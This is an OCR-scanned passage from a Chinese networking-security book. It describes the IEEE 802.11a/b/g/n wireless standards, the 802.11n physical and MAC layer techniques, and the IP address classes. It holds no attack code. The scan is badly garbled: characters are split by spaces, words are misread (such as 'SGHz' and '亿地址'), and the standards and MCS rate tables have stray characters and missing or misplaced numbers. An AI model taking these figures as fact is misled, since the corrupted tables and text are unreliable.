IEEE 802.11n 等 。 其 中 ，IEEE 802.11n 是 在 
IEEE 802.11g 和 IEEE 802.11a 之 上 发 展 起 来 


之 天 


的 一 项 技术 ， 最 大 的 特点 是 速率 提升 ， 理 
论 速率 最 高 可 达 600Mb/s， 而 目前 业界 主流 
为 300Mb/s。 下 图 为 IEEE 802.11 协 议 族 相互 
之 间 的 关系 。 


IMAC 
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IEEE 802.11 协 议 族 各 个 协议 发 布 的 时 
间 以 及 使 用 频率 等 信息 见 下 表 。 


表 802.11 协 议 族 的 详细 信息 


IEEE 802.11 IEEE 802.11b IEEE 802.11a IEEE 802.11g 
标准 发 布 时 间 1997.7 1999.9 1999.9 2003.6 
合法 频率 83.5MHz 83.5MHz 32.5MHz 83.5MHz 
5.150~5.350GHz 
率 范 2.400~2.483GHz | 2.400 一 2.483GHz 2.400~2.483GHz 
ee 5.725~5.850GHz 
非 重合 信道 | 六 3 
调制 技术 FHSS/DSSS OFDM CCK/OFDM 
要 6 9, 12，18，24，| 6 9, 12, 18, 24, 
bi 36, 48, 54 36, 48, 54 
论 上 的 UDP 
DP 7.1Mb/s 30.9Mb/s 30.9Mb/s 
量 (1500 byte) 
更 从 上 的 最 二 DR 生 5.9Mb/s 24.4Mb/s 24.4Mb/s 
吐 量 (1500 byte) 
兼容 性 与 11g 可 互通 与 11b/g 不 能 互通 与 11b 可 互通 
无 线 覆 盖 范 围 100m 50m <100m 


2.1.2 


黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


2.1.1 JEEE'802.11 


IEEE 802.11 是 无 线 局 域 网 通用 的 标 
准 ， 它 是 由 IEEE 所 定义 的 无 线 网 络 通信 的 
标准 。 虽 然 WiFi 使 用 了 IEEE 802.11 的 媒体 
访问 控制 层 (MAC) 和 物理 层 (PHY) ， 
但 是 两 者 并 不 完全 一 致 。 

IEEE 802.11 采 用 2.4GHz 和 5GHz 这 两 个 
ISM 频 段 。 其 中 2.4GHz 的 ISM 频 段 被 世界 
上 绝 大 多 数 国家 采用 ，5GHz ISM 频 段 在 一 
些 国家 和 地 区 的 使 用 情况 比较 复杂 ， 加 上 
高 载波 频率 所 带 来 了 负面 效果 ， 使 得 IEEE 
802.11 的 普及 受到 了 限制 ， 即 使 它 是 协议 
组 的 原始 标准 。 


IEEE 802.11a 
IEEE 802.11a 是 IEEE 802.11 原 始 标准 的 


第 一 个 修订 标准 ， 于 1999 年 9 月 获得 批准 。 


IEEE 802.11a 标 准 采用 了 与 原始 标准 相同 的 
核心 协议 ， 工 作 频 率 为 SGHz， 最 大 原始 数 
据 传 输 率 为 54Mb/s， 达 到 了 现实 网 络 中 等 
吞吐 量 〈20Mb/s) 的 要 求 。 

IEEE 802.11a 的 传输 技术 为 多 载波 调 
制 技 术 ， 被 广泛 应 用 在 办 公 室 、 家 庭 、 宾 
馆 、 机 场 等 众多 场合 。 它 工作 在 5GHzU- 
NII 频 带 ， 物 理 层 速率 可 达 54Mb/s， 传 输 
层 可 达 25Mb/s， 可 提供 25Mb/s 的 无 线 ATM 
接口 和 10Mb/s 的 以 太 网 无 线 帧 结构 接口 ， 
以 及 TDD/TDMA 的 空中 接口 ， 支持 语音 、 
数据 、 图 像 业 务 ; 一 个 扇 区 可 接 入 多 个 用 
户 ， 每 个 用 户 可 带 多 个 用 户 终端 。 

由 于 2.4GHz 频 带 已 经 被 广泛 使 用 ， 采 
5GHz 的 频带 让 IEEE 802.11a 具 有 更 少 冲 突 
的 优点 。 然 而 ， 高 载波 频率 也 带 来 了 负面 效 
果 。IEEE 802.11a 几 乎 被 限制 在 直线 范围 内 
使 用 ， 这 导致 必须 使 用 更 多 的 接 入 点 ;同样 
还 意味 着 IEEE 802.11a 的 传播 范围 不 大 。 


2.1.3 |IEEE 802.11b 
IEEE 802.11b 的 出 现 是 为 了 解决 传输 速 


率 低 的 问题 ， 如 以 前 无 线 局 域 网 的 速率 只 
有 1 一 2Mb/s， 而 许多 应 用 也 是 根据 10Mby/s 
以 太 网 速率 设计 的 ， 限 制 了 无 线 产 品 的 应 
用 种 类 。IEEE 802.11b 从 根本 上 改变 了 无 线 
局 域 网 的 设计 和 应 用 现状 。 

1. IEEE 802.11b 标 准 简介 


IEEE 802.11b 无 线 局 域 网 的 带宽 最 高 可 
达 11Mb/s， 比 IEEE 802.11 标 准 快 5 倍 ， 扩 大 
了 无 线 局 域 网 的 应 用 领域 。 另 外 也 可 根据 
实际 情况 采用 5.5Mb/s、2 Mb/s 和 1 Mb/s 带 
宽 ， 实 际 的 工作 速度 在 SMb/s 左 右 ， 与 普通 
的 10Base-T 规 格 有 线 局 域 网 几乎 是 处 于 同一 
水 平 。 作 为 公司 内 部 的 设施 ， 可 以 基本 满 
足 使 用 要 求 。IEEE 802.11b 使 用 的 是 开放 的 
2.4GHz 频 段 ， 不 需要 申请 就 可 使 用 。 既 可 
作为 对 有 线 网 络 的 补充 ， 也 可 独立 组 网 ， 
从 而 使 网 络 用 户 摆脱 网 线 的 束缚 ， 实 现 真 
正 意义 上 的 移动 应 用 。 

2. IEEE 802.11b 优 点 


IEEE 802.11b 具 有 如 下 优点 : 

(1) 使 用 范围 。IEEE 802.11b 支 持 以 
百 米 为 单位 的 范围 (在 室外 为 300m; 在 办 
公 环 境 中 最 长 为 100m) 。 

(2) 可 靠 性 。 与 以 太 网 类 似 的 连接 协 
议和 数据 包 确认 ， 来 提供 可 靠 的 数据 传送 
和 网 络 带 宽 的 有 效 使 用 。 

(3) 互 用 性 。 与 以 前 的 标准 不 同 的 
是 ，IEEE 802.11b 只 允许 一 种 标准 的 信号 发 
送 技术 ， 产 品 的 互 用 性 较 强 。 

(4) 电源 管理 。IEEE 802.11b 提 供 了 
网 卡 休眠 模式 ， 访 问 点 将 信息 缓冲 到 AP 
端 ， 延 长 了 电池 的 寿命 。 

(5) 漫游 支持 。 当 用 户 在 楼 房 或 公司 
部 门 之 间 移 动 时 ， 人 允许 在 访问 点 之 间 进 行 
无 缝 连接。 

3. IEEE 802.11b 运 作 模 式 


IEEE 802.11b 运 作 模 式 基本 分 为 两 种 : 
点 对 点 模式 和 基本 模式 。 下 面 进行 详细 介绍 : 


(1) 点 对 点 模式 ， 是 指 无 线 网 卡 和 无 线 
网 卡 之 间 的 通信 方式 ， 只 要 PC 插 上 无 线 网 
卡 即 可 与 另 一 台 具 有 无 线 网 卡 的 PC 连接 ， 
对 于 小 型 的 无 线 网 络 来 说 ， 是 一 种 方便 的 
连接 方式 ， 最 多 可 连接 256 台 PC。 

(2) 基本 模式 ， 是 指 无 线 网 络 规模 扩 
充 或 无 线 和 有 线 网 络 并 存 时 的 通信 方式 ， 
这 是 IEEE 802.11b 最 常用 的 方式 。 此 时 ， 
插 上 无 线 网 卡 的 PC 需要 由 接 入 点 与 另 一 
台 PC 连接 ， 接 入 点 负责 频段 管理 及 漫游 等 
指挥 工作 ， 一 个 接 入 点 最 多 可 连接 1024 台 
PC 〈 无 线 网 卡 ) 。 


4. IEEE 802.11b 的 典型 解决 方案 


IEEE 802.11b 无 线 局 域 网 由 于 其 便利 性 
和 可 伸缩 性 ， 特 别 适用 于 小 型 办 公 环 境 和 
家 庭 网 络 。 在 室内 环境 中 ， 针 对 不 同 的 实 
际 情况 可 以 有 不 同 的 解决 方案 。 

(1) 对 等 解决 方案 。 对 等 解决 方案 是 一 
种 最 简单 的 应 用 方案 ， 只 要 给 每 台 计 算 机 安 
装 一 片 无 线 网 卡 ， 即 可 相互 访问 。 如 果 需 要 
与 有 线 网 络 连接 ， 可 以 为 其 中 一 台 计 算 机 再 
安装 一 片 有 线 网 卡 ， 无 线 网 中 其 余 计算 机 即 
利用 这 台 计 算 机 作为 网 关 ， 访问 有 线 网 络 或 
共享 打印 机 等 设备 。 

但 对 等 解决 方案 是 一 种 点 对 点 方案 ， 
网 络 中 的 计算 机 只 能 一 对 一 互相 传递 信 
息 ， 而 不 能 同时 进行 多 点 访问 。 如 果 要 实 
现 与 有 线 局 域 网 一 样 的 互通 功能 ， 则 必须 
借助 接 入 点 。 

(2) 单 接 入 点 解决 方案 。 接 入 点 相当 
于 有 线 网 络 中 的 集线器 。 无 线 接 入 点 可 以 
连接 周边 的 无 线 网 络 终端 ， 形 成 星 型 网 
络 结构 ， 同 时 通过 10Base-T 端口 与 有 线 网 
络 相连 ， 使 整个 无 线 网 的 终端 都 能 访问 有 
线 网 络 的 资源 ， 并 可 通过 路 由 器 访问 外 部 
网 络 。 


2.1.4 |IEEE 802.11g 
与 之 前 的 IEEE 802.11 协 议 标准 相 比 ， 
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IEEE 802.11g 草 案 有 以 下 两 个 特点 : 一 是 在 
2.4GHz 频 段 使 用 正 交 频 分 复 用 (OFDM) 
调制 技术 ， 使 数据 传输 速率 提高 到 20Mb/s 以 
上 ; 二 是 能 够 与 IEEE 802.11b 的 WiFi 系 统 互 
联 互通 ， 可 共存 于 同一 AP 的 网 络 里 ， 从 而 
保障 了 后 向 兼容 性 。 这 样 原 有 的 WLAN 系 
统 可 以 平滑 地 向 高 速 WLAN 过 渡 ， 延 长 了 
IEEE 802.11b 产 品 的 使 用 寿命 ， 从 而 降低 
了 用 户 的 投资 。 

IEEE 802.11g 的 物理 帧 结构 分 为 前 导 信 
号 (Preamble) 、 信 头 Header 和 负载 Pay- 
load。Preamble 主 要 用 于 确定 STA 和 AP 之 间 
何 时 发 送 和 接收 数据 ， 传 输 进 行 时 告知 其 
他 STA 以 免 冲 突 ， 同 时 传送 同步 信号 及 帧 间 
隔 。Preamble 完 成 后 ， 接 收 方才 开始 接收 数 
据 。Header 在 Preamble 之 后 ， 用 来 传输 一 些 
重要 的 数据 ， 例 如 负载 长 度 、 传 输 速率 、 
服务 等 信息 。 由 于 数据 率 及 要 传送 字 节 的 
数量 不 同 ，Payload 的 包 长 变化 很 大 ， 可 以 
十 分 短 也 可 以 十 分 长 。 在 一 帧 信号 的 传输 
过 程 中 ，Preamble 和 Header 所 占 的 传输 时 
间 越 多 ，Payload 用 的 传输 时 间 就 越 少 ， 传 
输 的 效率 就 越 低 。 

综合 上 述 3 种 调制 技术 的 特点 ，IEEE 
802.11g 采 用 了 OFDM 等 关键 技术 来 保障 
其 优越 的 性 能 ， 分 别 对 Preamble、Header、 
Payload 进 行 调制 ， 这 种 帧 结构 称 为 OFDM/ 
OFDM 方 式 。IEEE 802.11g 兼 容 性 指 的 是 
IEEE 802.11g 设 备 能 和 IEEE 802.11b 设 备 
在 同一 个 AP 节 点 网 络 里 互联 互通 。IEEE 
802.11g 的 一 个 最 大 特点 就 是 要 保障 与 IEEE 
802.11bWiFi 系 统 兼 容 ，IEEE 802.11g 可 以 
接收 OFDM 和 CCK 数 据 ， 但 传统 的 WiFi 
系统 只 能 接收 CCK 信 息 ， 这 就 产生 了 一 
个 问题 ， 即 在 两 者 共存 的 环境 中 如 何 解 
决 由 于 IEEE 802.11b 不 能 解 调 OFDM 格 式 
信息 帧 头 所 带 来 的 冲突 问题 ， 而 为 了 解决 
上 述 问题 ，IEEE 802.11g 采 用 了 RTS/CTS 
技术 。 


到 


s 2.1.5 


多 轩 2.2.1 
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IEEE 802.11n 


IEEE 802.11n 是 在 IEEE 802.11g 和 IEEE 
802.11a 的 基础 上 发 展 起 来 的 一 项 技术 ， 
最 大 的 特点 是 速率 提升 ， 理 论 速率 最 高 可 
达 600Mb/s〈 目 前 业界 主流 为 300Mb/s) ， 
IEEE 802.11n 可 工作 在 2.4GHz 和 5GHz 两 个 
频段 。 

IEEE 802.11n 对 用 户 应 用 的 另 一 个 重要 
好 处 是 无 线 覆 盖 的 改善 。 由 于 采用 了 多 天 
线 技术 ， 无 线 信 号 (对 应 同一 条 信道 ) 将 
通过 多 条 路 径 从 发 射 端 到 接收 端 ， 从 而 提 
供 了 分 集 效 应 。 

另外 ， 除 了 吞吐 和 覆盖 的 改善 ，IEEE 
802.11n 技 术 还 有 一 个 重要 的 功能 就 是 要 兼 
容 传统 的 IEEE 802.11 a/b/g， 以 保证 现 有 网 
络 的 运行 。 


2.2 IEEE 802.11n 协 议 的 关键 
技术 

IEEE 802.11n 主 要 是 结合 物理 层 和 

MAC 层 的 优化 来 充分 提高 WLAN 技 术 的 

吞吐 。 主 要 的 物理 层 技术 涉及 了 MIMO、 


MIMO-OFDM、40MHz、Short GI 等 技术 ， 
从 而 将 物理 层 吞吐 提高 到 600Mb/s。 


物理 层 关键 技术 


IEEE 802.11n 中 涉及 的 物理 层 关 键 技术 
包括 MIMO、SDM、MIMO-OFDM、FEC、 
Short Guard Interval、40MHz 绑 定 技术 、 
MCS、MRC 等 ， 下 面 进行 详细 介绍 。 


1. MIMO 


MIMO 是 IEEE 802.11n 物 理 层 的 核心 ， 
指 的 是 一 个 系统 采用 多 个 天 线 进行 无 线 信 
号 的 收发 。 右 上 图 为 MIMO 的 架构 示意 图 。 
它 是 当今 无 线 最 热门 的 技术 ， 无 论 是 4G、 
IEEE 802.16e WIMAX， 还 是 IEEE 802.1ln， 
都 把 MIMO 列 入 射频 的 关键 技术 。 
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MIMO 主 要 有 如 下 的 典型 应 用 ， 包 括 : 

(1) 提高 吞吐 。 通 过 增加 多 通道 ， 并 
发 传 传递 数据 ， 可 以 成 倍 提高 系统 吞吐 。 

(2) 提高 无 线 链 路 的 健壮 性 和 改善 接 
收 端的 SNR。 通 过 多 条 通道 ， 无 线 信号 通 
过 多 条 路 径 从 发 射 端 到 达 接收 端 多 个 接收 
天 线 。 由 于 经 过 多 条 路 径 传播 ， 多 条 路 径 
不 会 同时 出 现 严重 衰竭 ， 采 用 某 种 算法 把 
这 些 多 个 信号 进行 综合 计算 ， 可 以 改善 接 
收 端的 SNR。 需 要 注意 的 是 ， 这 里 是 同一 
条 数据 在 多 个 路 径 上 传递 了 多 份 ， 并 不 能 
够 提高 吞吐 。 


2. SDM 

当 基 于 MIMO 同 时 传递 多 条 独立 信道 
(spatial streams) ， 下 图 为 通过 MIMO 传 弟 
多 条 信道 的 示意 图 ， 信 道 X1、X2 进 行 传递 
时 ， 将 成 倍 地 提高 系统 的 吞吐 。 


X1 Y1 


MIMO 系 统 支持 信道 的 数量 取决 于 发 
送 天 线 和 接收 天 线 的 最 小 值 。 如 发 送 天 线 
数量 为 3， 而 接收 天 线 数量 为 2， 则 支持 的 
信道 为 2。MIMO/SDM 系 统一 般 用 “发 射 天 
线 数量 X 接收 天 线 数量 ”表示 。 如 上 图 为 
2X2 MIMO/SDM 系 统 。 显 然 ， 增 加 天 线 可 
以 提高 MIMO 支 持 的 信道 数 。 但 是 综合 
本 、 实 际 效果 等 多 方面 因素 ， 目 前 业界 的 
WLAN AP 都 普遍 采用 3X3 的 模式 。 

MIMO/SDM 是 在 发 射 端 和 接收 端 之 
间 ， 通 过 存在 的 多 条 路 径 〈 通 道 ) 来 同时 
传播 多 条 流 。 一 直 以 来 ， 无 线 技术 〈 如 


OFMD) 总 是 企图 克服 多 径 效应 的 影响 ， 而 
MIMO 恰 恰 是 在 利用 多 径 来 传输 数据 ， 下 图 
为 MIMO 利 用 多 路 径 传输 数据 示意 图 。 


3. MIMO-OFDM 


在 室内 等 典型 应 用 环境 下 ， 由 于 多 径 
效应 的 影响 ， 信 号 在 接收 端 很 容易 发 生 符 
号 间 干 扰 (ISTI) ， 从 而 导致 丢 包 率 增高 。 
OFDM 调 制 技术 是 将 一 个 物理 信道 划分 为 多 
个 子 载体 〈sub-carrier) ， 将 高 速率 的 信道 
调制 成 多 个 较 低速 率 的 子 信道 ， 通 过 这 些 
子 载体 进行 通信 ， 从 而 减少 ISI 机 会 ， 提 高 
物理 层 吞 吐 。 

OFDM 在 IEEE 802.11a/g 时 代 已 经 成 熟 
使 用 ， 到 了 IEEE 802.11n 时 代 ， 它 将 MIMO 
支持 的 子 载体 从 52 个 提高 到 56 个 。 需 要 注 
意 的 是 ， 无 论 IEEE 802.11a/g， 还 是 IEEE 
802.11n， 它 们 都 使 用 了 4 个 子 载体 作为 
pilot 子 载体 ， 而 这 些 子 载体 并 不 用 于 数据 
的 传递 。 所 以 IEEE 802.11n MIMO 将 物理 
速率 从 传统 的 54Mb/s 提 高 到 58.5Mb/s〔 即 
54X52/48) 。 


4. FEC (Forward Error Correction) 


按照 无 线 通 信 的 基本 原理 ， 为 了 使 信 
息 适 合 在 无 线 信道 这 样 不 可 靠 的 媒介 中 传 
递 ， 发 射 端 将 把 信息 进行 编码 并 携带 元 余 
信息 ， 以 提高 系统 的 纠 错 能 力 ， 使 接收 端 
能 够 恢复 原始 信息 。IEEE 802.11n 所 采用 的 
QAM-64 编 码 机 制 可 以 将 编码 率 (有 效 信 
息 和 整个 编码 的 比率 ) 从 3/4 提高 到 5/6。 
所 以 ， 对 于 一 条 信道 ， 在 MIMO-OFDM 基 
础 之 上 ， 物 理 速 率 从 58.5Mb/s 提 高 到 65Mb/s 
( 即 58.5X5/6 二 3/4) 。 右 图 为 改变 数据 排 
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序 示意 图 ， 改 变数 据 的 摆 列 方式 由 原先 的 
圆 形 数据 改 为 方形 数据 ， 这 样 使 得 空间 利 
用 更 加 合理 。 


5. Short Guard Interval (GI) 


由 于 多 径 效应 的 影响 ， 信 息 符 号 
(Information Symbol) 将 通过 多 条 路 径 传 
递 ， 可 能 会 发 生 彼 此 碰撞 ， 导 致 ISI 干 扰 。 
为 此 ，IEEE 802.11a/g 标 准 要 求 在 发 送信 
息 符号 时 ， 必 须 保证 在 信息 符号 之 间 存 在 
800 ns 的 时 间 间 隔 ， 这 个 间隔 被 称 为 Guard 
Interval (GI) 。IEEE 802.11n 仍 然 使 用 默认 
的 800 ns GI。 当 多 径 效应 不 是 很 严重 时 ， 
用 户 可 以 将 该 间隔 配置 为 400， 对 于 一 条 信 
道 ， 可 以 将 吞吐 提高 近 10%， 即 从 65Mb/s 
提高 到 72.2Mb/s。 对 于 多 径 效 应 较 明显 的 环 
境 ， 不 建议 使 用 Short Guard Interval (GI) 。 


6. 40MHz 绑 定 技术 


这 个 技术 最 为 直观 : 对 于 无 线 技术 ， 
提高 所 用 频谱 的 宽度 ， 可 以 最 为 直接 地 提 
高 吞吐 。 就 好 比 是 宽松 的 河道 ， 水 流通 过 
率 自然 提高 。 传 统 IEEE 802.11a/g 使 用 的 频 
宽 是 20MHz， 而 IEEE 802.11n 支 持 将 相 邻 两 
个 频 宽 绑 定 为 40MHz 来 使 用 ， 所 以 可 以 最 
直接 地 提高 吞吐 。 

需要 注意 的 是 : 对 于 一 条 信道 ， 并 不 
仅仅 是 将 吞吐 从 72.2 Mb/s 提 高 到 144.4( 即 
72.2X2) Mb/s。 对 于 20MHz 频 宽 ， 为 了 减 
少 相 邻 信道 的 和 干扰， 在 其 两 侧 预 留 了 一 小 
部 分 的 带宽 边界 ， 通 过 40MHz 绑 定 技术 ， 
这 些 预 留 的 带宽 也 可 以 用 来 通信 ， 可 以 将 
子 载体 从 104 (52X2) 提高 到 108Mb/s。 按 
照 72.2X2X108/104 进 行 计算 ， 所 得 到 的 吞 
吐 能 力 达 到 了 150Mb/s。 
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7. MCS (Modulation Coding Scheme) 


在 IEEE 802.11a/b/g 时 代 ， 配 置 AP 工作 的 速率 非常 简单 ， 只 要 指定 特定 radio 类 型 
(802.11a/b/g) 所 使 用 的 速率 集 ， 速 率 范围 从 1Mb/s 到 54Mb/s， 一 共有 12 种 可 能 的 物理 速 


率 ， 见 下 表 。 
表 配置 AP 工作 速率 表 
传输 速率 Mb/s) 
MCS index 信道 数量 | 调制 方式 20MHz 带 宽 40MHz 带 宽 
800ns 帧 间距 | 400ns 帧 间距 | 800ns 帧 间距 | 400ns 帧 间距 
0 时 BPSK 6.5 13.5 15 
和 和 QPSK 13 27 30 
2 1 QPSK Ws 40.5 45 
导 1 16-QAM 26 和 54 60 
4 1 16-QAM 81 90 
5 1 64-QAM 106 120 
6 和 64-QAM 121.5 135 
介 1 64-QAM 135 150 
8 二 BPSK | aa | 144 | 27 30 
全 多 QPSK 54 60 
10 2 QPSK 81 90 
11 2 16-QAM 108 120 
12 2 16-QAM 86.7 162 180 
好 2 64-QAM | 104 | ns | 216 240 
14 2 64-QAM 243 270 
15 pF 64-QAM 130 144.4 270 300 
到 了 IEEE 802.11n 时 代 ， 由 于 物理 速 ” 目的 是 改善 接收 端的 信号 质量 。 基 本 原理 
率 依赖 于 调制 方法 、 编 码 率 、 信 道 数量 、 ”是 : 对 于 来 自发 射 端的 同一 个 信号 ， 由 于 
是 否 40MHz 绑 定 等 多 个 因素 。 这 些 影响 吞 ”在 接收 端 使 用 多 天 线 接收 ， 那 么 这 个 信号 


吐 的 因素 组 合 在 一 起 ， 将 产生 非常 多 的 物 
理 速 率 供 选 择 使 用 。 比 如 基于 Short GI， 
40MHz 绑 定 等 技术 ， 在 4 条 信道 的 条 件 下 ， 
物理 速率 可 以 达到 600Mb/s 〈 即 4X150) 。 
为 此 ，IEEE 802.11n 提 出 了 MCS 的 概念 。 
MCS 可 以 理解 为 这 些 影响 速率 因素 的 完整 
组 合 ， 每 种 组 合用 整数 来 唯一 标示 。 对 于 
AP、MCS 普 遍 支 持 的 范围 为 0 一 15。 


8. MRC (Maximal-Ratio Combining) 
MRC 和 吞吐 提高 没有 任何 关系 ， 它 的 


将 经 过 多 条 路 径 〈 多 个 天 线 ) 被 接收 端 所 
接收 。 多 个 路 径 质量 同时 差 的 概率 非常 小 ， 
一 般 总 有 一 条 路 径 的 信号 较 好 。 那 么 在 接收 
端 可 以 使 用 某 种 算法 ， 对 各 条 接收 路 径 上 的 
信号 进行 加 权 汇 总 (显然 ， 信 号 最 好 的 路 
径 分 配 最 高 的 权重 ) ， 实 现 接 收 端的 信号 改 
善 。 当 多 条 路 径 上 信号 都 不 太 好 时 ， 仍 然 通 
过 MRC 技 术 获 得 较 好 的 接收 信号 。 


2.2.2 ”MAC 层 关键 技术 
MAC 层 的 技术 主要 针对 帧 聚合 技术 、 


Block ACK 以 及 兼容 IEEE 802.11a/b/g 
协议 ， 其 中 ， 帧 聚合 包含 针对 MSDTU 的 
聚合 (A-MSDU) 和 针对 MPDU 的 聚合 
(CA-MPDU) 。 


1.A-MSDU 


A-MSDU 技 术 是 指 把 多 个 MSDU 通 过 一 
定 的 方式 聚合 成 一 个 较 大 的 载荷 。 下 图 为 
A-MSDU 结 构 示意 图 ， 这 里 的 MSDU 可 以 认 
为 是 以 太 网 报 文 。 


Ar-MSDU 本 

通常 当 AP 或 无 线 客户 端 从 协议 栈 收 到 
报 文 (MSDU) 时 ， 会 打上 以 太 网 报 文 头 ， 
它 被 称 为 A-MSDU Subframe; 而 在 通过 
射频 口 发 送出 去 前 ， 需 要 一 一 将 其 转换 成 
802.11 报 文 格式 。 而 A-MDSU 技 术 旨 在 将 若 
干 个 A-MSDU Subframe 聚 合 到 一 起 ， 并 封 
装 为 一 个 802.11 报 文 进行 发 送 。 从 而 减少 了 
发 送 每 一 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header 和 802.11 MAC 头 的 开销 ， 
同时 减少 了 应 答 帧 的 数量 ， 提 高 了 报 文 发 
送 的 效率 。 

A-MSDU 报 文 是 由 若干 个 A-MSDU 
Subframe 组 成 的 ， 每 个 Subframe 均 是 由 
Subframe header (Ethernet Header) 、 一 个 
MSDU 和 0 一 3 字 节 的 填充 组 成 。 

MSDU 技 术 只 适用 于 所 有 MSDU 的 目的 
端 为 同一 个 HT STA 的 情况 。 


2. A-MPDU 


与 A-MSDU 不 同 的 是 ，A-MPDU 育 合 
是 经 过 802.11 报 文 封装 后 的 MPDU， 这 里 的 
MPDU 是 指 经 过 802.11 封 装 过 的 数据 帧 ， 右 
图 为 A-MPDU 结 构 示 意图 。 
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=] 国王 目下 
ET ETE 
报头 报头 报头 


MPDU #4 MPDU #2 


| 
通过 一 次 性 发 送 若 干 个 MPDU， 减 少 
了 发 送 每 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header， 从 而 提高 系统 吞吐 量 。 
其 中 MPDU 格 式 和 802.11 定 义 的 相同 ， 
而 MPDU Delimiter 是 为 了 使 用 A-MPDU 而 定 
义 的 新 的 格式 。A-MPDU 技 术 同样 只 适用 
于 所 有 MPDU 的 目的 端 为 同一 个 HT STA 的 
情况 。 


3. Block ACK 


为 保证 数据 传输 的 可 靠 性 ，IEEE 802.11 
协议 规定 每 收 到 一 个 单 播 数据 帧 ， 都 必须 立 
即 回应 以 ACK 帧 。A-MPDU 的 接收 端 在 收 
到 A-MPDU 后 ， 需 要 对 其 中 的 每 一 个 MPDU 
进行 处 理 ， 因 此 同样 针对 每 一 个 MPDU 发 送 
应 答 帧 。Block Acknowledgement 通 过 使 用 
一 个 ACK 帧 来 完成 对 多 个 MPDU 的 应 答 ， 
以 降低 这 种 情况 下 的 ACK 帧 的 数量 。 

Block Ack 机 制 分 三 个 步骤 来 实现 : 

(1) 通过 ADDBA Request/Response 报 
文 协商 建立 Block ACK 协 定 。 

(2) 协商 完成 后 ， 发 送 方 可 以 发 送 有 
限 多 个 QoS 数据 报 文 ， 接 收 方 会 保留 这 些 数 
据 报 文 的 接收 状态 ， 待 收 到 发 送 方 的 Block- 
AckReq 报 文 后 ， 接 收 方 则 回应 以 BlockAck 
报 文 来 对 之 前 接收 到 的 多 个 数据 报 文 做 一 
次 性 回复 。 

(3) 通过 DELBA Request 报 文 来 撤销 
一 个 已 经 建立 的 Block Ack 协 定 。 
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4. 兼容 802.11a/b/g 


WLAN 标 准 从 802.11a/b 发 展 到 
802.11g， 再 到 现在 的 802.11n， 提 供 良好 的 
向 后 兼容 性 是 非常 重要 的 。802.11g 提 供 了 


| 一 套 保护 机 制 来 允许 802.11b 的 无 线 用 户 接 


入 802.11g 网 络 。 同 样 地 ，802.11n 协 议 提供 
相似 的 机 制 来 允许 802.11a/b/g 用 户 的 接 入 。 

802.11n 设 备 发 送 的 信号 可 能 无 法 被 
802.11a/b/g 的 设备 解析 到 ， 造 成 802.11a/ 
b/g 设备 无 法 探测 到 802.11n 设 备 ， 从 而 往 
空中 直接 发 送信 号 ， 导 致 信道 使 用 上 的 冲 
突 。 为 解决 这 个 问题 ， 当 802.11n 运 行 在 混 
合 模式 〈 即 同时 有 802.11a/b/g 设 备 在 网 络 
中 ) 时 ， 会 在 发 送 的 报 文 头 前 添加 能 够 被 
802.11a 或 802.11b/g 设 备 正确 解析 的 前 导 码 。 
从 而 保证 802.11a/b/g 设 备 能 够 侦 听 到 802.1ln 
信号 ， 并 启用 冲突 避免 机 制 ， 进 而 实现 
802.11n 的 设备 与 302.11a/b/g 设 备 的 互通 。 

802.11n 向 下 兼容 802.11a/g，802.11a/g 
的 终端 接 入 802.11ln 网 络 后 ， 由 于 MIMO 技 
术 提 高 了 SNR， 因 此 802.11a/g 的 网 络 最 大 吞 
吐 量 54Mb/s 范 围 有 所 扩大 。 同 时 802.11n 的 
网 络 性 在 802.11a/g 终 端 和 802.11n 终 端 混 合 
接 入 时 ， 网 络 整体 吞吐 量 较 纯 802.11n 终 端 
接 入 有 一 定 的 下 降 ， 此 时 802.11n 终 端的 速 
率 还 是 高 于 802.11a/g 的 终端 性 能 。 


5. MIMO 技 术 


MIMO 是 802.11n 物 理 层 的 核心 ， 通 过 
结合 40MHz 绑 定 、MIMO-OFDM 等 多 项 技 
术 ， 可 以 将 物理 层 速率 提高 到 600Mb/s。 为 
了 充分 发 挥 物理 层 的 能 力 ，802.11n 对 MAC 
层 采 用 了 帧 聚合 、Block ACK 等 多 项 技术 进 
行 优化 。802.11n 带 来 大 吞吐 、 广 覆盖 等 提 
高 的 同时 ， 也 增加 了 更 多 的 技术 挑战 。 了 
解 这 些 技术 ,将 有 助 于 更 好 地 应 用 802.11n 
和 解决 应 用 所 面临 的 实际 问题 。 


2.3 IP 地 址 
在 无 线 网 络 中 ， 一 台 主机 对 应 一 个 IP 


地 址 ， 因 此 ， 黑 客 要 想 攻击 某 台 主机 ， 只 
须 找到 这 台 主 机 的 亿 地 址 ， 然 后 进行 入 侵 攻 
击 即 可 ， 可 以 说 JP 地址 是 黑客 实施 入 侵 攻 击 
的 “门牌 号 ”。 


2.3.1 认识 IP 地 址 


IP 地 址 用 于 在 TCP/IP 通 信 协 议 中 标 
记 每 台 计 算 机 的 地 址 ， 通 常 使 用 十 进 制 
来 表示 ， 如 192.168.1.100， 但 在 计算 机 内 
部 ，IP 地 址 是 一 个 32 位 的 二 进 制 数值 ， 
如 11000000 10101000 00000001 00000110 
(192.168.1.6) 。 
一 个 完整 的 IP 地 址 由 两 部 分 组 成 ， 分 
别 是 网 络 号 和 主机 号 。 网 络 号 表示 其 所 属 
的 网 络 段 编号 ， 主 机 号 则 表示 该 网 段 中 该 
主机 的 地 址 编号 。 
按照 网 络 规模 的 大 小 ，IP 地 址 可 以 分 
为 A、B、C、D、E 五 类 ， 其 中 A、B、C 类 
是 三 种 主要 的 类 型 地 址 ，D 类 专 供 多 目 传送 
用 的 多 目地 址 ，E 类 用 于 扩展 备用 地 址 。 
e@ A 类 IP 地 址 。 一 个 A 类 IP 地 址 由 1 
字 节 的 网 络 地 址 和 3 字 节 主机 地 
址 组 成 ， 网 络 地 址 的 最 高 位 必须 
是 “0”， 地 址 范围 从 1.0.0.0 到 


126.0.0.0。 
e B 类 IP 地 址 。 一 个 B 类 IP 地 址 由 2 字 
节 的 网 络 地 址 和 2 字 节 的 主机 地 址 


组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“10”， 地 址 范围 从 128.0.0.0 到 
191.255.255.255。 

e C 类 IP 地 址 。 一 个 C 类 IP 地 址 由 3 字 
节 的 网 络 地 址 和 1 字 节 的 主机 地 址 
组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“110”。 地 址 范围 从 192.0.0.0 到 
223.255.255.255。 

